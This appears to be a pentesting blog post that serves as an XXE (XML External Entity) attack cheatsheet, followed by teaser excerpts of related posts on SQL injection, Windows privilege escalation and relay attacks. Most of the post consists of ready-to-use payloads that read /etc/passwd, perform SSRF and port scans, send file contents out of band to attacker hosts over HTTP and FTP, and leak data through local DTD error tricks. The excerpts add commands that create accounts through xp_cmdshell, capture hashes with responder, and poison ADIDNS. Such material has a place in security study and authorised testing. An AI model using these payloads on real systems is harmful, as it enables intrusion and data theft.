Skip to main content

XML External Entities - XXE Cheatsheet

By

 XML External Entity (XXE) attacks are a type of security vulnerability that exploit weaknesses in the processing of XML data. These attacks occur when XML input containing a reference to an external entity is processed by a weakly configured XML parser, allowing an attacker to access the file system, carry out server-side request forgery (SSRF), or even execute remote code. XXE vulnerabilities arise due to dangerous features in the XML specification, which are often enabled in standard parsers. Attackers can leverage these features to perform actions like viewing sensitive files, interacting with back-end systems, or escalating the attack to compromise servers. Preventing XXE requires secure coding practices, such as disabling external entities and using fewer complex data formats.

XXE Detection 

  • Request Body contains '<?xml version="1.0" encoding="UTF-8"?>'
  • Content Type header is 'text/xml'

Basic XXE - add it in the request parameters

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<productId>&xxe;</productId>

#Basic XXE 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % a SYSTEM "file:///etc/passwd">
%a;
]>


XXE TO SSRF

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://127.0.0.1/"> ]>
<productId>&xxe;</productId>

#Portscan 
#Intercept the request in burp and scan the ports 0-65535 and filter the response to determine the open port
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://127.0.0.1:8888/"> ]>
<productId>&xxe;</productId>

When Only Parameter Data is being passed into XML 

#set the below query as parameter value
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

XXE using SVG File Upload

- This works when File Upload Accepts SVG files and 
- Content-Type filter accepts 'text/xml'
- Then you can add the XML body to the request 

#Upload a SVG Image, Intercept the request, replace the image content with below 
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

#/etc/hostname content will be displayed in the image


Out of Band XXE 
- Use XML Parameter Entities when regular entities are blocked 
- XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://juhn4dxiscly79brnyvras5cy34usrgg.oastify.com"> ]>
<productId>&xxe;</productId>

# Parameter Entity
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://0st42uvzqtjf5q98lft8893twk2bqaez.oastify.com"> %xxe; ]>

DATA Exfiltration using out of band XXE 
- In this attacker, we are going to host a Web server which contains a dtd file 
- dtd file contains the which file to the accessed and where the contents of the file should be sent
- once we execute our malicious url on the target application, it will respond back with the data mentioned in the dtd file

#Host dtd file on python server
python3 -m http.server 80

#save the contents into exp.dtd
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

#Attacking the Application
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://10.10.10.1/exploit"> %xxe;]>

Note:
# If HTTP is not allowed, you can use FTP 
<!ENTITY % file SYSTEM "file:///etc/passwd"> 
<!ENTITY % output "<!ENTITY rrr SYSTEM 'ftp://ATTACKERSERVER:2121/%file;'>">
%output;

If the Server Responds with Error messages

#Host the file
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'file://INVALID/?x=%file;'>">
%eval;
%exfiltrate;

#Run the Exploit
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://10.10.10.1/exploit"> %xxe;]>

When Out of Band Exploitation is not Possible to Exfiltrate Data Because of Egress Filters
Exploiting XXE using Local DTD

- Locate any DTD file available on the server
- Enumerate using file:///etc/passwd - this only works if the server throws some kind of error message
- Common dtd file path is - 
/usr/share/yelp/dtd/docbookx.dtd
/usr/share/xml/fontconfig/fonts.dtd
/usr/share/discover/dtd/conffile.dtd
/usr/share/discover/dtd/discover.dtd
/usr/share/X11/xkb/rules/xkb.dtd

Use this wordlist - dtd_files.txt contains huge list of dtd paths for enumeration
# Find a valid DTD File on the Victim Application Server
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>

#Exploit if path /usr/share/yelp/dtd/docbookx.dtd is available

<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>

#Exploit when the path /usr/share/xml/fontconfig/fonts.dtd is avaialable 


<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">

    <!ENTITY % expr 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>

    %local_dtd;
]>

#Exploit for - /usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd

<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd">

    <!ENTITY % Boolean '(aa) #IMPLIED>
        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ATTLIST attxx aa "bb"'>

    %local_dtd;
]>


Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more